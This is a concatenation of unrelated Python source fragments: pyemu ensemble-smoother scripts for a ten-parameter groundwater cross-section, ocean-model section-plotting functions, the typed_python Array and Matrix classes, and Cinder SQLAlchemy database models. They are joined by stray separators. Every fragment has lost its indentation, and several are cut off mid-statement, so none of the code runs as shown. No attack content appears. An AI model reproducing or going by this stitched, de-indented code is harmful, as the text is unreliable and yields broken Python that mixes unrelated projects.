oe_base = pd.read_csv("10par_xsec.pst.obsensemble.{0:04d}.csv".format(niter))
for oname in obs.obsnme:
ax = plt.subplot(111)
oe_base.loc[:,oname].hist(bins=20, ax=ax, color="0.5", alpha=0.54)
oe_ieq.loc[:,oname].hist(bins=20,ax=ax,color="b",alpha=0.5)
ax.set_xlim(oe_ieq.loc[:,oname].min()*0.75,oe_ieq.loc[:,oname].max() * 1.25)
plt.savefig(oname+".png")
plt.close("all")
#oe_base.to_csv("base.csv")
#oe_ieq.to_csv("ieq.csv")
os.chdir(os.path.join("..",".."))
def plot_10par_opt_traj():
import numpy as np
import pandas as pd
from matplotlib.backends.backend_pdf import PdfPages
import matplotlib.pyplot as plt
import pyemu
d = os.path.join("smoother","10par_xsec")
case1 = "10par_xsec.pst"
case2 = "10par_xsec_opt.pst"
files = os.listdir(d)
case1_oes = [f for f in files if case1 in f and "obsensemble" in f]
case2_oes = [f for f in files if case2 in f and "obsensemble" in f]
case1_oes = [pd.read_csv(os.path.join(d,f)) for f in case1_oes]
case2_oes = [pd.read_csv(os.path.join(d,f)) for f in case2_oes]
case1_pes = [f for f in files if case1 in f and "parensemble" in f]
case2_pes = [f for f in files if case2 in f and "parensemble" in f]
case1_pes = [pd.read_csv(os.path.join(d, f)) for f in case1_pes]
case2_pes = [pd.read_csv(os.path.join(d, f)) for f in case2_pes]
print(case1_oes)
print(case2_oes)
pst = pyemu.Pst(os.path.join(d,"10par_xsec.pst"))
with PdfPages("traj.pdf") as pdf:
for oname in pst.observation_data.obsnme:
#dfs1 = [c.loc[:,[oname]] for c in case1_oes]
df1 = pd.concat([c.loc[:,[oname]] for c in case1_oes],axis=1)
df2 = pd.concat([c.loc[:, [oname]] for c in case2_oes], axis=1)
df1.columns = np.arange(df1.shape[1])
df2.columns = np.arange(df2.shape[1])
fig = plt.figure(figsize=(10,5))
ax = plt.subplot(111)
[ax.plot(df1.columns,df1.loc[i,:],color='0.5',lw=0.2) for i in df1.index]
[ax.plot(df2.columns, df2.loc[i, :], color='b', lw=0.2) for i in df2.index]
ax.set_title(oname)
pdf.savefig()
plt.close(fig)
for pname in pst.parameter_data.parnme:
#dfs1 = [c.loc[:,[oname]] for c in case1_oes]
df1 = pd.concat([c.loc[:,[pname]] for c in case1_pes],axis=1)
df2 = pd.concat([c.loc[:, [pname]] for c in case2_pes], axis=1)
df1.columns = np.arange(df1.shape[1])
df2.columns = np.arange(df2.shape[1])
fig = plt.figure(figsize=(10,5))
ax = plt.subplot(111)
[ax.plot(df1.columns,df1.loc[i,:],color='0.5',lw=0.2) for i in df1.index]
[ax.plot(df2.columns, df2.loc[i, :], color='b', lw=0.2) for i in df2.index]
ax.set_title(pname)
pdf.savefig()
plt.close(fig)
def tenpar_restart():
import os
import numpy as np
import flopy
import pyemu
os.chdir(os.path.join("smoother","10par_xsec"))
pst = pyemu.Pst("10par_xsec.pst")
dia_parcov = pyemu.Cov.from_parameter_data(pst,sigma_range=6.0)
v = pyemu.utils.ExpVario(contribution=0.25,a=60.0)
gs = pyemu.utils.GeoStruct(variograms=[v],transform="log")
par = pst.parameter_data
k_names = par.loc[par.parnme.apply(lambda x: x.startswith('k')),"parnme"]
sr = flopy.utils.SpatialReference(delc=[10],delr=np.zeros((10))+10.0)
full_cov = gs.covariance_matrix(sr.xcentergrid[0,:],sr.ycentergrid[0,:],k_names)
dia_parcov.drop(list(k_names),axis=1)
cov = dia_parcov.extend(full_cov)
es = pyemu.EnsembleSmoother("10par_xsec.pst",parcov=cov,
num_slaves=10,port=4005,verbose=True)
lz = es.get_localizer().to_dataframe()
#the k pars upgrad of h01_04 and h01_06 are localized
upgrad_pars = [pname for pname in lz.columns if "_" in pname and\
int(pname.split('_')[1]) > 4]
lz.loc["h01_04",upgrad_pars] = 0.0
upgrad_pars = [pname for pname in lz.columns if '_' in pname and \
int(pname.split('_')[1]) > 6]
lz.loc["h01_06", upgrad_pars] = 0.0
lz = pyemu.Matrix.from_dataframe(lz).T
print(lz)
es.initialize(parensemble="par_start.csv",obsensemble="obs_start.csv",
restart_obsensemble="obs_restart.csv",init_lambda=10000.0)
for it in range(1):
#es.update(lambda_mults=[0.1,1.0,10.0],localizer=lz,run_subset=20)
es.update(lambda_mults=[0.1,1.0,10.0],run_subset=30)
os.chdir(os.path.join("..",".."))
def tenpar_failed_runs():
import os
import numpy as np
import pyemu
os.chdir(os.path.join("smoother","10par_xsec"))
#csv_files = [f for f in os.listdir('.') if f.endswith(".csv")]
#[os.remove(csv_file) for csv_file in csv_files]
pst = pyemu.Pst("10par_xsec.pst")
dia_parcov = pyemu.Cov.from_parameter_data(pst,sigma_range=6.0)
v = pyemu.utils.ExpVario(contribution=0.25,a=60.0)
gs = pyemu.utils.GeoStruct(variograms=[v],transform="log")
par = pst.parameter_data
k_names = par.loc[par.parnme.apply(lambda x: x.startswith('k')),"parnme"]
sr = pyemu.utils.SpatialReference(delc=[10],delr=np.zeros((10))+10.0)
full_cov = gs.covariance_matrix(sr.xcentergrid[0,:],sr.ycentergrid[0,:],k_names)
dia_parcov.drop(list(k_names),axis=1)
cov = dia_parcov.extend(full_cov)
es = pyemu.EnsembleSmoother("10par_xsec.pst",parcov=cov,
num_slaves=2,
verbose=True)
lz = es.get_localizer().to_dataframe()
#the k pars upgrad of h01_04 and h01_06 are localized
upgrad_pars = [pname for pname in lz.columns if "_" in pname and\
int(pname.split('_')[1]) > 4]
lz.loc["h01_04",upgrad_pars] = 0.0
upgrad_pars = [pname for pname in lz.columns if '_' in pname and \
int(pname.split('_')[1]) > 6]
lz.loc["h01_06", upgrad_pars] = 0.0
lz = pyemu.Matrix.from_dataframe(lz).T
print(lz)
#es.initialize(num_reals=10,init_lambda=10000.0)
es.initialize(parensemble="par_start.csv",obsensemble="obs_start.csv")
for it in range(10):
#es.update(lambda_mults=[0.1,1.0,10.0],localizer=lz,run_subset=20)
#es.update(lambda_mults=[0.1,1.0,10.0],run_subset=7)
es.update(use_approx=False,lambda_mults=[0.1,1.0,10.0])
os.chdir(os.path.join("..",".."))
def tenpar_plot():
import os
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
import pandas as pd
from pyemu import Pst
d = os.path.join("smoother","10par_xsec")
pst = Pst(os.path.join(d,"10par_xsec.pst"))
plt_dir = os.path.join(d,"plot")
if not os.path.exists(plt_dir):
os.mkdir(plt_dir)
par_files = [os.path.join(d,f) for f in os.listdir(d) if "parensemble." in f
and ".png" not in f]
par_dfs = [pd.read_csv(par_file,index_col=0) for par_file in par_files]
par_names = list(par_dfs[0].columns)
#mx = (pst.parameter_data.loc[:,"parubnd"] * 1.1)
#mn = (pst.parameter_data.loc[:,"parlbnd"] * 0.9)
mx = max([pdf.max().max() for pdf in par_dfs])
num_reals_plot = 12
plot_rows = 2
plot_cols = 6
assert plot_rows * plot_cols == num_reals_plot
figsize = (20,10)
with PdfPages(os.path.join(plt_dir,"parensemble_reals.pdf")) as pdf:
for par_file,par_df in zip(par_files,par_dfs):
#print(par_file)
fig | |
if ignore is not None: maskedField1 = numpy.ma.masked_array(field1, mask=[field1==ignore])
else: maskedField1 = field1.copy()
yCoord, zCoord, field1 = m6toolbox.section2quadmesh(y, z, maskedField1)
# Diagnose statistics
yzWeighting = yzWeight(y, z)
s1Min, s1Max, s1Mean, s1Std, s1RMS = myStats(maskedField1, yzWeighting, debug=debug)
if ignore is not None: maskedField2 = numpy.ma.masked_array(field2, mask=[field2==ignore])
else: maskedField2 = field2.copy()
yCoord, zCoord, field2 = m6toolbox.section2quadmesh(y, z, maskedField2)
s2Min, s2Max, s2Mean, s2Std, s2RMS = myStats(maskedField2, yzWeighting, debug=debug)
dMin, dMax, dMean, dStd, dRMS = myStats(maskedField1 - maskedField2, yzWeighting, debug=debug)
dRxy = corr(maskedField1 - s1Mean, maskedField2 - s2Mean, yzWeighting)
s12Min = min(s1Min, s2Min); s12Max = max(s1Max, s2Max)
xLims = numpy.amin(yCoord), numpy.amax(yCoord); yLims = boundaryStats(zCoord)
if debug:
print('s1: min, max, mean =', s1Min, s1Max, s1Mean)
print('s2: min, max, mean =', s2Min, s2Max, s2Mean)
print('s12: min, max =', s12Min, s12Max)
# Choose colormap
if nbins is None and (clim is None or len(clim)==2): cBins=35
else: cBins=nbins
if nbins is None and (dlim is None or len(dlim)==2): nbins=35
if colormap is None: colormap = chooseColorMap(s12Min, s12Max)
cmap, norm, extend = chooseColorLevels(s12Min, s12Max, colormap, clim=clim, nbins=cBins, extend=extend)
if addplabel: preTitleA = 'A: '; preTitleB = 'B: '
else: preTitleA = ''; preTitleB = ''
if axis is None:
setFigureSize(aspect, resolution, npanels=npanels, debug=debug)
#plt.gcf().subplots_adjust(left=.13, right=.94, wspace=0, bottom=.05, top=.94, hspace=0.15)
if npanels in [2, 3]:
axis = plt.subplot(npanels,1,1)
plt.pcolormesh(yCoord, zCoord, field1, cmap=cmap, norm=norm)
if interactive: addStatusBar(yCoord, zCoord, field1)
cb1 = plt.colorbar(fraction=.08, pad=0.02, extend=extend)
if centerlabels and len(clim)>2: cb1.set_ticks( 0.5*(clim[:-1]+clim[1:]) )
axis.set_facecolor(landcolor)
if contour:
zz = 0.5 * ( z[:-1] + z[1:])
yy = 0.5 * ( y[:-1] + y[1:])
print(yy.shape, zz.shape, maskedField1.shape)
matplotlib.rcParams['contour.negative_linestyle'] = 'solid'
cs = plt.contour(yy+0*zz, zz, maskedField1, colors='k')
plt.clabel(cs, fmt='%2.1f', fontsize=14)
if splitscale is not None:
for zzz in splitscale[1:-1]: plt.axhline(zzz,color='k',linestyle='--')
axis.set_yscale('splitscale', zval=splitscale)
plt.xlim( xLims ); plt.ylim( yLims )
annotateStats(axis, s1Min, s1Max, s1Mean, s1Std, s1RMS, webversion=webversion)
axis.set_xticklabels([''])
if len(zlabel+zunits)>0: plt.ylabel(label(zlabel, zunits))
if len(title1)>0: plt.title(preTitleA+title1)
axis = plt.subplot(npanels,1,2)
plt.pcolormesh(yCoord, zCoord, field2, cmap=cmap, norm=norm)
if interactive: addStatusBar(yCoord, zCoord, field2)
cb2 = plt.colorbar(fraction=.08, pad=0.02, extend=extend)
if contour:
cs = plt.contour(yy+0*zz, zz, maskedField2, colors='k')
plt.clabel(cs, fmt='%2.1f', fontsize=14)
if centerlabels and len(clim)>2: cb2.set_ticks( 0.5*(clim[:-1]+clim[1:]) )
axis.set_facecolor(landcolor)
if splitscale is not None:
for zzz in splitscale[1:-1]: plt.axhline(zzz,color='k',linestyle='--')
axis.set_yscale('splitscale', zval=splitscale)
plt.xlim( xLims ); plt.ylim( yLims )
annotateStats(axis, s2Min, s2Max, s2Mean, s2Std, s2RMS, webversion=webversion)
if npanels>2: axis.set_xticklabels([''])
if len(zlabel+zunits)>0: plt.ylabel(label(zlabel, zunits))
if len(title2)>0: plt.title(preTitleB+title2)
if npanels in [1, 3]:
axis = plt.subplot(npanels,1,npanels)
if dcolormap is None: dcolormap = chooseColorMap(dMin, dMax)
if dlim is None and dStd>0:
cmap, norm, dextend = chooseColorLevels(dMean-sigma*dStd, dMean+sigma*dStd, dcolormap, clim=dlim, nbins=nbins, extend='both', autocenter=True)
else:
cmap, norm, dextend = chooseColorLevels(dMin, dMax, dcolormap, clim=dlim, nbins=nbins, extend=dextend, autocenter=True)
plt.pcolormesh(yCoord, zCoord, field1 - field2, cmap=cmap, norm=norm)
if interactive: addStatusBar(yCoord, zCoord, field1 - field2)
cb3 = plt.colorbar(fraction=.08, pad=0.02, extend=dextend)
if centerdlabels and len(dlim)>2: cb3.set_ticks( 0.5*(dlim[:-1]+dlim[1:]) )
axis.set_facecolor(landcolor)
if splitscale is not None:
for zzz in splitscale[1:-1]: plt.axhline(zzz,color='k',linestyle='--')
axis.set_yscale('splitscale', zval=splitscale)
plt.xlim( xLims ); plt.ylim( yLims )
annotateStats(axis, dMin, dMax, dMean, dStd, dRMS)
if len(zlabel+zunits)>0: plt.ylabel(label(zlabel, zunits))
axis.annotate(' r(A,B)=%.5g\n'%(dRxy), xy=(1.0,-1.07), xycoords='axes fraction', verticalalignment='top', horizontalalignment='center', fontsize=10)
if len(ylabel+yunits)>0: plt.xlabel(label(ylabel, yunits))
if len(title3)>0: plt.title(title3)
if len(suptitle)>0: plt.suptitle(suptitle)
if save is not None: plt.savefig(save)
if interactive: addInteractiveCallbacks()
if show: plt.show(block=False)
def ztplot(field, t=None, z=None,
tlabel=None, tunits=None, zlabel=None, zunits=None,
splitscale=None,
title='', suptitle='', autocenter=False,
clim=None, colormap=None, extend=None, centerlabels=False,
nbins=None, landcolor=[.5,.5,.5], contour=False,
aspect=[16,9], resolution=576, axis=None,
ignore=None, save=None, debug=False, show=False, interactive=False):
"""
Renders section plot of scalar field, field(x,z).
Arguments:
field Scalar 2D array to be plotted.
t t (or time) coordinate (1D array).
z z coordinate (1D array).
tlabel The label for the t axis. Default 'Time'.
tunits The units for the t axis. Default 'Years'.
zlabel The label for the z axis. Default 'Elevation'.
zunits The units for the z axis. Default 'm'.
splitscale A list of depths to define equal regions of projection in the vertical, e.g. [0.,-1000,-6500]
title The title to place at the top of the panel. Default ''.
suptitle The super-title to place at the top of the figure. Default ''.
autocenter If clim generated by script, set to be centered on zero. Default False.
clim A tuple of (min,max) color range OR a list of contour levels. Default None.
colormap The name of the colormap to use. Default None.
extend Can be one of 'both', 'neither', 'max', 'min'. Default None.
centerlabels If True, will move the colorbar labels to the middle of the interval. Default False.
nbins The number of colors levels (used is clim is missing or only specifies the color range).
landcolor An rgb tuple to use for the color of land (no data). Default [.5,.5,.5].
contour If true, draw and label contour lines. Default is False.
aspect The aspect ratio of the figure, given as a tuple (W,H). Default [16,9].
resolution The vertical resolution of the figure given in pixels. Default 720.
axis The axis handle to plot to. Default None.
ignore A value to use as no-data (NaN). Default None.
save Name of file to save figure in. Default None.
debug If true, report stuff for debugging. Default False.
show If true, causes the figure to appear on screen. Used for testing. Default False.
interactive If true, adds interactive features such as zoom, close and cursor. Default False.
"""
# Create coordinates if not provided
tlabel, tunits, zlabel, zunits = createTZlabels(t, z, tlabel, tunits, zlabel, zunits)
if debug: print('t,z label/units=',tlabel,tunits,zlabel,zunits)
if ignore is not None: maskedField = numpy.ma.masked_array(field, mask=[field==ignore])
else: maskedField = field.copy()
field2 = maskedField.T
tCoord = t; zCoord = z
# Diagnose statistics
sMin, sMax, sMean, sStd, sRMS = myStats(maskedField, None, debug=debug)
tLims = numpy.amin(tCoord), numpy.amax(tCoord)
zLims = numpy.amin(zCoord), numpy.amax(zCoord)
#zLims = boundaryStats(zCoord)
# Choose colormap
if nbins is None and (clim is None or len(clim)==2): nbins=35
if colormap is None: colormap = chooseColorMap(sMin, sMax)
cmap, norm, extend = chooseColorLevels(sMin, sMax, colormap, clim=clim, nbins=nbins, extend=extend, autocenter=autocenter)
if axis is None:
setFigureSize(aspect, resolution, debug=debug)
#plt.gcf().subplots_adjust(left=.10, right=.99, wspace=0, bottom=.09, top=.9, hspace=0)
axis = plt.gca()
cs = axis.pcolormesh(tCoord, zCoord, field2, cmap=cmap, norm=norm)
if interactive: addStatusBar(tCoord, zCoord, field2)
cb = plt.colorbar(cs, ax=axis, fraction=.08, pad=0.02, extend=extend)
if contour:
matplotlib.rcParams['contour.negative_linestyle'] = 'solid'
cs = axis.contour(tCoord, zCoord,field2,colors='k',lw=0.50)
axis.clabel(cs,inline=1, fontsize=10)
if centerlabels and len(clim)>2: cb.set_ticks( 0.5*(clim[:-1]+clim[1:]) )
axis.set_facecolor(landcolor)
if splitscale is not None:
for zzz in splitscale[1:-1]: plt.axhline(zzz,color='k',linestyle='--')
axis.set_yscale('splitscale', zval=splitscale)
axis.set_xlim( tLims ); axis.set_ylim( zLims )
axis.annotate('max=%.5g\nmin=%.5g'%(sMax,sMin), xy=(0.0,1.01), xycoords='axes fraction', verticalalignment='bottom', fontsize=12)
if sMean is not None:
axis.annotate('mean=%.5g\nrms=%.5g'%(sMean,sRMS), xy=(1.0,1.01), xycoords='axes fraction', verticalalignment='bottom', horizontalalignment='right', fontsize=12)
axis.annotate(' sd=%.5g\n'%(sStd), xy=(1.0,1.01), xycoords='axes fraction', verticalalignment='bottom', horizontalalignment='left', fontsize=12)
if len(tlabel+tunits)>0: axis.set_xlabel(label(tlabel, tunits), fontsize=16)
if len(zlabel+zunits)>0: axis.set_ylabel(label(zlabel, zunits), fontsize=16)
if len(title)>0: axis.set_title(title)
if len(suptitle)>0: plt.suptitle(suptitle)
if splitscale is not None:
axis.invert_yaxis()
if save is not None: plt.savefig(save)
if interactive: addInteractiveCallbacks()
if show: plt.show(block=False)
def chooseColorMap(sMin, sMax, difference=None):
"""
Based on the min/max extremes of the data, choose a colormap that fits the data.
"""
if difference == True: return 'dunnePM'
elif sMin<0 and sMax>0: return 'dunnePM'
#elif sMax>0 and sMin<0.1*sMax: return 'hot'
#elif sMin<0 and sMax>0.1*sMin: return 'hot_r'
else: return 'dunneRainbow'
def chooseColorLevels(sMin, sMax, colorMapName, clim=None, nbins=None, steps=[1,2,2.5,5,10], extend=None, logscale=False, autocenter=False):
"""
If nbins is a positive integer, choose sensible color levels with nbins colors.
If clim is a 2-element tuple, create color levels within the clim range
or if clim is a vector, use clim as contour levels.
If clim provides more than 2 color interfaces, nbins must be absent.
If clim is absent, the sMin,sMax are used as the color range bounds.
If autocenter is True and clim is None then the automatic color levels are centered.
Returns cmap, norm and extend.
"""
if nbins is None and clim is None: raise Exception('At least one of clim or nbins is required.')
if clim is not None:
if len(clim)<2: raise Exception('clim must be at least 2 values long.')
if nbins is None and len(clim)==2: raise Exception('nbins must be provided when clims specifies a color range.')
if nbins is not None and len(clim)>2: raise Exception('nbins cannot be provided when clims specifies color levels.')
if clim is None:
if autocenter:
levels | |
<reponame>APrioriInvestments/typed_python
# Copyright 2017-2020 typed_python Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
from typed_python import (
Class, Member, ListOf, Final, TypeFunction, Tuple, Float32, Int32, NotCompiled,
Entrypoint
)
from typed_python.array.fortran import axpy, gemv, gemm, getri, getrf
def min(a, b):
return a if a < b else b
@TypeFunction
def Array(T):
"""Implements a simple, strongly typed array."""
class Array_(Class, Final):
_vals = Member(ListOf(T))
_offset = Member(int)
_stride = Member(int)
_shape = Member(int)
dimensions = 1
ElementType = T
def __init__(self, vals):
self._vals = ListOf(T)(vals)
self._offset = 0
self._stride = 1
self._shape = len(vals)
def __init__(self, vals, offset, stride, shape): # noqa
self._vals = vals
self._offset = offset
self._stride = stride
self._shape = shape
def __init__(self): # noqa
self._vals = ListOf(T)()
self._offset = 0
self._stride = 1
self._shape = 0
@property
def shape(self):
return Tuple(int)((self._shape,))
def __len__(self):
return self._shape
def isCanonical(self):
return self._offset == 0 and self._stride == 1 and self._shape == len(self._vals)
##################################################################
# Operators
# these are repeated below for 'matrix' because we don't have a
# good way of doing class mixins yet.
def __add__(self, other):
self._inplaceBinopCheck(other)
res = self.clone()
res += other
return res
def __iadd__(self, other):
self._inplaceBinopCheck(other)
if (T is float or T is Float32) and isinstance(other, Array(T)):
p = self._vals.pointerUnsafe(self._offset)
p2 = other._vals.pointerUnsafe(other._offset)
axpy(self._shape, 1.0, p2, self._stride, p, other._stride)
else:
self._inplaceBinop(other, lambda a, b: a + b)
return self
def __mul__(self, other):
self._inplaceBinopCheck(other)
res = self.clone()
res._inplaceBinop(other, lambda a, b: a * b)
return res
def __imul__(self, other):
self._inplaceBinopCheck(other)
self._inplaceBinop(other, lambda a, b: a * b)
return self
def __truediv__(self, other):
self._inplaceBinopCheck(other)
res = self.clone()
res._inplaceBinop(other, lambda a, b: a / b)
return res
def __itruediv__(self, other):
self._inplaceBinopCheck(other)
self._inplaceBinop(other, lambda a, b: a / b)
return self
def __floordiv__(self, other):
self._inplaceBinopCheck(other)
res = self.clone()
res._inplaceBinop(other, lambda a, b: a // b)
return res
def __ifloordiv__(self, other):
self._inplaceBinopCheck(other)
self._inplaceBinop(other, lambda a, b: a // b)
return self
def __sub__(self, other):
self._inplaceBinopCheck(other)
res = self.clone()
res._inplaceBinop(other, lambda a, b: a - b)
return res
def __isub__(self, other):
self._inplaceBinopCheck(other)
self._inplaceBinop(other, lambda a, b: a - b)
return self
def abs(self):
self = self.clone()
self._inplaceUnaryOp(lambda a: -a if a < 0 else a)
return self
def __pow__(self, p):
self = self.clone()
self._inplaceUnaryOp(lambda a: a ** p)
return self
def log(self):
self = self.clone()
self._inplaceUnaryOp(lambda a: math.log(a))
return self
def cos(self):
self = self.clone()
self._inplaceUnaryOp(lambda a: math.cos(a))
return self
def sin(self):
self = self.clone()
self._inplaceUnaryOp(lambda a: math.sin(a))
return self
def tanh(self):
self = self.clone()
self._inplaceUnaryOp(lambda a: math.tanh(a))
return self
def __neg__(self):
self = self.clone()
self._inplaceUnaryOp(lambda a: -a)
return self
def __pos__(self):
return self.clone()
# operators
#########################################
@Entrypoint
def __matmul__(self, other: Array(T)) -> T: # noqa
if other.shape != self.shape:
raise Exception(f"Mismatched array sizes: {self.shape} != {other.shape}")
res = T()
ownStride = self._stride
otherStride = other._stride
ownP = self._vals.pointerUnsafe(self._offset)
otherP = other._vals.pointerUnsafe(other._offset)
for i in range(self._shape):
res += ownP.get() * otherP.get()
ownP += ownStride
otherP += otherStride
return res
def __matmul__(self, other: Matrix(T)) -> Array(T): # noqa
return other.__rmatmul__(self)
@Entrypoint
def _inplaceBinopCheck(self, other: T):
pass
@Entrypoint # noqa
def _inplaceBinopCheck(self, other: Array(T)): # noqa
if other._shape != self._shape:
raise Exception("Mismatched array sizes.")
@Entrypoint
def _inplaceBinop(self, other: Array(T), binaryFunc):
p = self._vals.pointerUnsafe(self._offset)
p2 = other._vals.pointerUnsafe(other._offset)
for i in range(self._shape):
(p + i * self._stride).set(binaryFunc(
(p + i * self._stride).get(),
(p2 + i * other._stride).get()
))
return self
@Entrypoint
def _inplaceUnaryOp(self, f):
p = self._vals.pointerUnsafe(self._offset)
for i in range(self._shape):
p.set(f(p.get()))
p += self._stride
@Entrypoint # noqa
def _inplaceBinop(self, other: T, binaryFunc): # noqa
p = self._vals.pointerUnsafe(self._offset)
for i in range(self._shape):
(p + i * self._stride).set(binaryFunc((p + i * self._stride).get(), other))
return self
@Entrypoint
def clone(self):
return Array(T)(self.toList())
@Entrypoint
def toList(self):
newVals = ListOf(T)()
newVals.reserve(self._shape)
pWrite = newVals.pointerUnsafe(0)
pRead = self._vals.pointerUnsafe(self._offset)
for i in range(self._shape):
pWrite.set(pRead.get())
pWrite += 1
pRead += self._stride
newVals.setSizeUnsafe(self._shape)
return newVals
@Entrypoint
@staticmethod
def full(count: int, value: T):
if count < 0:
raise Exception("Can't have a negative array size.")
res = ListOf(T)()
res.resize(count, value)
return Array(T)(res)
@Entrypoint
def sum(self):
res = T()
pRead = self._vals.pointerUnsafe(self._offset)
for i in range(self._shape):
res += pRead.get()
pRead += self._stride
return res
@staticmethod
def ones(count):
return Array_.full(count, 1.0)
@staticmethod
def zeros(count):
return Array_.full(count, 0.0)
def get(self, i):
return self._vals[i * self._stride + self._offset]
def set(self, i, value):
self._vals[i * self._stride + self._offset] = value
def __getitem__(self, i):
if i < 0 or i >= self._shape:
raise IndexError(f"Index {i} is out of bounds [0, {self._shape})")
return self._vals[i * self._stride + self._offset]
def __setitem__(self, i, val):
if i < 0 or i >= self._shape:
raise IndexError(f"Index {i} is out of bounds [0, {self._shape})")
self._vals[i * self._stride + self._offset] = val
def __repr__(self):
items = ListOf(str)()
for i in range(self._shape):
items.append(str(self[i]))
if i > 20:
items.append("...")
break
return f"Array({T.__name__})([" + ", ".join(items) + "])"
def __str__(self):
return repr(self)
return Array_
@TypeFunction
def Matrix(T):
class Matrix_(Class, Final):
_vals = Member(ListOf(T))
# rows, then columns
_shape = Member(Tuple(int, int))
_offset = Member(int)
_stride = Member(Tuple(int, int))
dimensions = 2
def __init__(self, vals, offset, stride, shape):
self._vals = ListOf(T)(vals)
self._offset = offset
self._stride = stride
self._shape = shape
def __init__(self): # noqa
self._vals = ListOf(T)()
self._shape = Tuple(int, int)((0, 0))
self._stride = Tuple(int, int)((0, 1))
self._offset = 0
@property
def _flatShape(self):
return self._shape[0] * self._shape[1]
@property
def shape(self):
return self._shape
##################################################################
# Operators
def __add__(self, other):
self._inplaceBinopCheck(other)
res = self.clone()
res._inplaceBinop(other, lambda a, b: a + b)
return res
def __iadd__(self, other):
self._inplaceBinopCheck(other)
self._inplaceBinop(other, lambda a, b: a + b)
return self
def __mul__(self, other):
self._inplaceBinopCheck(other)
res = self.clone()
res._inplaceBinop(other, lambda a, b: a * b)
return res
def __imul__(self, other):
self._inplaceBinopCheck(other)
self._inplaceBinop(other, lambda a, b: a * b)
return self
def __truediv__(self, other):
self._inplaceBinopCheck(other)
res = self.clone()
res._inplaceBinop(other, lambda a, b: a / b)
return res
def __itruediv__(self, other):
self._inplaceBinopCheck(other)
self._inplaceBinop(other, lambda a, b: a / b)
return self
def __floordiv__(self, other):
self._inplaceBinopCheck(other)
res = self.clone()
res._inplaceBinop(other, lambda a, b: a // b)
return res
def __ifloordiv__(self, other):
self._inplaceBinopCheck(other)
self._inplaceBinop(other, lambda a, b: a // b)
return self
def __sub__(self, other):
self._inplaceBinopCheck(other)
res = self.clone()
res._inplaceBinop(other, lambda a, b: a - b)
return res
def __isub__(self, other):
self._inplaceBinopCheck(other)
self._inplaceBinop(other, lambda a, b: a - b)
return self
def abs(self):
self = self.clone()
self._inplaceUnaryOp(lambda a: -a if a < 0 else a)
return self
def __pow__(self, p):
self = self.clone()
self._inplaceUnaryOp(lambda a: a ** p)
return self
def log(self):
self = self.clone()
self._inplaceUnaryOp(lambda a: math.log(a))
return self
def cos(self):
self = self.clone()
self._inplaceUnaryOp(lambda a: math.cos(a))
return self
def sin(self):
self = self.clone()
self._inplaceUnaryOp(lambda a: math.sin(a))
return self
def tanh(self):
self = self.clone()
self._inplaceUnaryOp(lambda a: math.tanh(a))
return self
def __neg__(self):
self = self.clone()
self._inplaceUnaryOp(lambda a: -a)
return self
def __pos__(self):
return self.clone()
# operators
#########################################
@Entrypoint
def _inplaceBinopCheck(self, other: T) -> None:
pass
@Entrypoint # noqa
def _inplaceBinopCheck(self, other: Matrix(T)) -> None: # noqa
if other.shape[0] != self.shape[0]:
raise Exception("Mismatched array sizes.")
if other.shape[1] != self.shape[1]:
raise Exception("Mismatched array sizes.")
@Entrypoint
def _inplaceBinop(self, other: Matrix(T), binaryFunc):
pSelf = self._vals.pointerUnsafe(self._offset)
pOther = other._vals.pointerUnsafe(self._offset)
for i0 in range(self._shape[0]):
for i1 in range(self._shape[1]):
(pSelf + i1 * self._stride[1]).set(
binaryFunc(
(pSelf + i1 * self._stride[1]).get(),
(pOther + i1 * other._stride[1]).get()
)
)
pSelf += self._stride[0]
pOther += other._stride[0]
return self
@Entrypoint # noqa
def _inplaceBinop(self, other: T, binaryFunc): # noqa
pSelf = self._vals.pointerUnsafe(self._offset)
for i0 in range(self._shape[0]):
for i1 in range(self._shape[1]):
(pSelf + i1 * self._stride[1]).set(
binaryFunc(
(pSelf + i1 * self._stride[1]).get(),
other
)
)
pSelf += self._stride[0]
return self
def _inplaceUnaryOp(self, f):
p | |
# Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Piston Cloud Computing, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
SQLAlchemy models for cinder data.
"""
from oslo_config import cfg
from oslo_db.sqlalchemy import models
from oslo_utils import timeutils
from sqlalchemy import Column, Integer, String, Text, schema
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import ForeignKey, DateTime, Boolean
from sqlalchemy.orm import relationship, backref, validates
CONF = cfg.CONF
BASE = declarative_base()
class CinderBase(models.TimestampMixin,
models.ModelBase):
"""Base class for Cinder Models."""
__table_args__ = {'mysql_engine': 'InnoDB'}
# TODO(rpodolyaka): reuse models.SoftDeleteMixin in the next stage
# of implementing of BP db-cleanup
deleted_at = Column(DateTime)
deleted = Column(Boolean, default=False)
metadata = None
def delete(self, session):
"""Delete this object."""
self.deleted = True
self.deleted_at = timeutils.utcnow()
self.save(session=session)
class Service(BASE, CinderBase):
"""Represents a running service on a host."""
__tablename__ = 'services'
id = Column(Integer, primary_key=True)
host = Column(String(255)) # , ForeignKey('hosts.id'))
binary = Column(String(255))
topic = Column(String(255))
report_count = Column(Integer, nullable=False, default=0)
disabled = Column(Boolean, default=False)
availability_zone = Column(String(255), default='cinder')
disabled_reason = Column(String(255))
class ConsistencyGroup(BASE, CinderBase):
"""Represents a consistencygroup."""
__tablename__ = 'consistencygroups'
id = Column(String(36), primary_key=True)
user_id = Column(String(255), nullable=False)
project_id = Column(String(255), nullable=False)
host = Column(String(255))
availability_zone = Column(String(255))
name = Column(String(255))
description = Column(String(255))
volume_type_id = Column(String(255))
status = Column(String(255))
class Cgsnapshot(BASE, CinderBase):
"""Represents a cgsnapshot."""
